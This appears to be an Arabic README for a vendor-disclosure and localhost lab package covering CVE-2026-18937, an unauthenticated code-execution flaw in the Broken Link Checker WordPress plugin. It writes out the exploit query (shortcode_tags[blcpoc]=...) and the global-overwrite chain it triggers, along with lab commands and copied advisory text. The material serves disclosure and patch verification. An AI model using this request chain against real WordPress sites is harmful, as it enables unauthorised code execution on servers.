
حزمة استغلال إثبات المفهوم وإعادة إنتاج المختبر لـ CVE-2026-18937، وهي ثغرة تنفيذ تعليمات عن بُعد (RCE) بدون مصادقة في إضافة Broken Link Checker الخاصة بـ WordPress قبل الإصدار 2.4.12.
abraxaslabs.tech · github.com/abraxas · @abraxas_null · CVE-2026-18937
Broken Link Checker 2.4.11 — غير معروف
إن إضافة Broken Link Checker لـ WordPress قبل الإصدار 2.4.12 لا تحدّ من متغيرات الاستعلام التي تقبلها من مدخلات المستخدم على المواقع التي تستخدم الروابط الثابتة البسيطة (plain permalinks)، مما يسمح للمستخدمين غير المصادَق عليهم بالكتابة فوق متغيرات PHP العامة (global) العشوائية، وتنفيذ تعليمات برمجية عشوائية على الخادم عند تفعيل قالب كلاسيكي (غير كتلي).
| CVE | CVE-2026-18937 · CVE.org |
| CWE | CWE-94 |
| CVSS | حرج: 9.0 CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H |
| المنتج | Broken Link Checker |
| المتأثر | جميع الإصدارات حتى 2.4.11 (شاملةً) |
| المُرقَّع | 2.4.12 وما بعده |
| المصادقة | لا شيء (انظر خريطة المصدر) |
| الترخيص | GNU Affero GPL v3.0 |
| المختبر | 127.0.0.1 فقط · حزمة إفصاح للمورّد/العميل، وليست أداة فحص |
حقن متغيرات الاستعلام هو Webhook::parse_request الذي يدمج $_GET، وليس إجراء ajax action=. بروتوكول HTTP هو GET / مع مفاتيح استعلام إضافية.
GET/?page_id=4&shortcode_tags[blcpoc]=poc_witness_18937GET /?page_id=<front page id>&shortcode_tags[blcpoc]=poc_witness_18937Webhook::parse_request (plain permalinks) → $wp->query_vars += $_GETWP::register_globals → $GLOBALS['shortcode_tags']['blcpoc']=poc_witness_18937the_content('[blcpoc]') → poc_witness_18937() → POCWitness18937يحتوي جسم استجابة HTTP على POCWitness18937. أي HTML عام للصفحة الرئيسية بدون هذه السلسلة لا يُعد نجاحاً.
افعل هذا أولاً: حدّث Broken Link Checker إلى 2.4.12 أو أحدث.
تحقق بعد الترقية
CVE-2026-18937-Abraxas-Labs.py مقابل البناء المُرقَّع: يجب ألا يظهر الشاهد المُعيَّن.إذا لم تستطع التحديث فوراً
استهدف فقط http://127.0.0.1:8088 (أو عنوان loopback الذي ربطته). لا توجّه هذا السكربت إلى الإنترنت.
python3 CVE-2026-18937-Abraxas-Labs.py
النجاح هو الشاهد المذكور أعلاه في جسم الاستجابة. HTML عام بحالة 200 ليس كذلك.
حزمة loopback المستخدمة لإعادة الإنتاج. صور رسمية ما لم يبنِ Dockerfile في هذا المجلد من المصدر.
cd lab
docker compose up --force-recreate
اربط شجرة المنتج المتأثر بجانب Compose إذا كان ملف YAML يربط دليلاً محلياً (ملف zip للإضافة / وسم المصدر من جدول الإصدارات). لا تنشر شيئاً باستثناء 127.0.0.1.
# CVE-2026-18937 (structured records)
- input: `https://nvd.nist.gov/vuln/detail/CVE-2026-18937`
- CWE: CWE-94
- published: 2026-08-19T06:17:38.847
## NVD description
The Broken Link Checker WordPress plugin before 2.4.12 does not limit which query variables it accepts from user input on sites using plain permalinks, allowing unauthenticated users to overwrite arbitrary PHP global variables, and to execute arbitrary code on the server when a classic (non-block) is active.
## MITRE description
The Broken Link Checker WordPress plugin before 2.4.12 does not limit which query variables it accepts from user input on sites using plain permalinks, allowing unauthenticated users to overwrite arbitrary PHP global variables, and to execute arbitrary code on the server when a classic (non-block) is active.
## Affected
- Unknown Broken Link Checker 0 affected
## References (JSON sources only)
- https://wpscan.com/vulnerability/a23b76eb-107d-4e02-8eae-c3c5fa5b003d/
- https://github.com/advisories/GHSA-c2xc-88v3-37g2
- https://nvd.nist.gov/vuln/detail/CVE-2026-18937
- https://wpscan.com/vulnerability/a23b76eb-107d-4e02-8eae-c3c5fa5b003d
## GitHub advisory
The Broken Link Checker WordPress plugin before 2.4.12 does not limit which query variables it...
The Broken Link Checker WordPress plugin before 2.4.12 does not limit which query variables it accepts from user input on sites using plain permalinks, allowing unauthenticated users to overwrite arbitrary PHP global variables, and to execute arbitrary code on the server when a classic (non-block) is active.
حزمة الإفصاح هذه مرخّصة بموجب GNU Affero General Public License v3.0. انظر LICENSE.
هذه الحزمة مخصّصة للمورّد، ومالك الموقع، والمختبرات المُصرَّح لها. يتواصل السكربت مع 127.0.0.1. استخدامه ضد أنظمة لا تملكها غير مُصرَّح به من Abraxas Labs. لا ضمان.